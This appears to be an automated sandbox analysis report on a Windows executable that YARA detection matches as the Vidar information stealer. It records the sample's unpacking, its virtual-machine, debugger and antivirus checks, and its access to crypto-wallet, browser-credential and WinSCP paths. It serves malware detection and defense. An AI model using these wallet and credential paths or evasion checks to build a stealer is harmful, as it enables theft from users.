Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: freebl3.pdb source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: mozglue.pdbP source: mozglue.dll.1.dr
Source: Binary string: freebl3.pdbp source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr
Source: Binary string: nss3.pdb@ source: nss3.dll.1.dr
Source: Binary string: C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: softokn3.pdb@ source: softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: 1C:\lesuzu\bicavujepoc rikuwevokociku_bonotalehimuk pikajune\xo.pdb source: file.exe
Source: Binary string: nss3.pdb source: nss3.dll.1.dr
Source: Binary string: mozglue.pdb source: mozglue.dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.1.dr

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 1.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
PE file contains sections with non-standard names
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00418110 GetEnvironmentVariableA,_memset,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418110
Source: initial sample Static PE information: section name: .text entropy: 7.723744016228705
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 6012
Source: unknown Network traffic detected: HTTP traffic on port 6012 -> 49774
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424B20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress, 1_2_00424B20
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401070 GetSystemInfo, 1_2_00401070
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412170 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412170
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004171C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA, 1_2_004171C0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412450
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00412690 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00412690
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B7E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0041B7E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040C8E0 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 1_2_0040C8E0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00424960 FindFirstFileW,FindNextFileW,FindNextFileW, 1_2_00424960
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004169A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_004169A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040AAC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_0040AAC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00416BB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00416BB0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040DE60 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 1_2_0040DE60
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: file.exe, 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: VMware
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpcg
Source: file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: BDISPLAYVMwareVMwareX3NS7I
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: DISPLAYVMware
Source: file.exe, 00000001.00000002.3707864447.0000000004670000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00430728 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00430728
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00418110 GetEnvironmentVariableA,_memset,lstrcat,lstrcat,lstrcat,SetEnvironmentVariableA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418110
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041B050 StrCmpCA,StrCmpCA,StrCmpCA,_memset,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,GetProcessHeap,RtlAllocateHeap,StrCmpCA,lstrcat,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen, 1_2_0041B050
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004352B7 SetUnhandledExceptionFilter, 1_2_004352B7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00430728 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00430728

HIPS / PFW / Operating System Protection Evasion
barindex
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417FA0 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, 1_2_00417FA0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 1_2_0041F650
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_0043705F
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 1_2_00437154
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 1_2_004371FB
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 1_2_00437256
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 1_2_0043B3E2
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 1_2_00437427
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_004374E7
Source: C:\Users\user\Desktop\file.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_0043B4BC
Source: C:\Users\user\Desktop\file.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 1_2_0043754E
Source: C:\Users\user\Desktop\file.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 1_2_0043758A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree, 1_2_0041F6B8
Source: C:\Users\user\Desktop\file.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 1_2_0043688A
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00420970 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 1_2_00420970
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00420970 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 1_2_00420970
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F5B0 GetUserNameA, 1_2_0041F5B0
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3698626677.0000000002606000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected Vidar stealer
Source: Yara match File source: 1.2.file.exe.4100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.4100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: Electrum-LTC
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: file.exe String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: JaxxLiberty
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: file.exe String found in binary or memory: \Exodus\backups
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: Exodus\exodus.wallet
Source: file.exe String found in binary or memory: default_wallet
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: file.exe, 00000001.00000002.3701045776.00000000043F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\.*2
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: multidoge.wallet
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\9ufvw9sb.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\9ufvw9sb.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: 1.2.file.exe.4100e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.4100e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
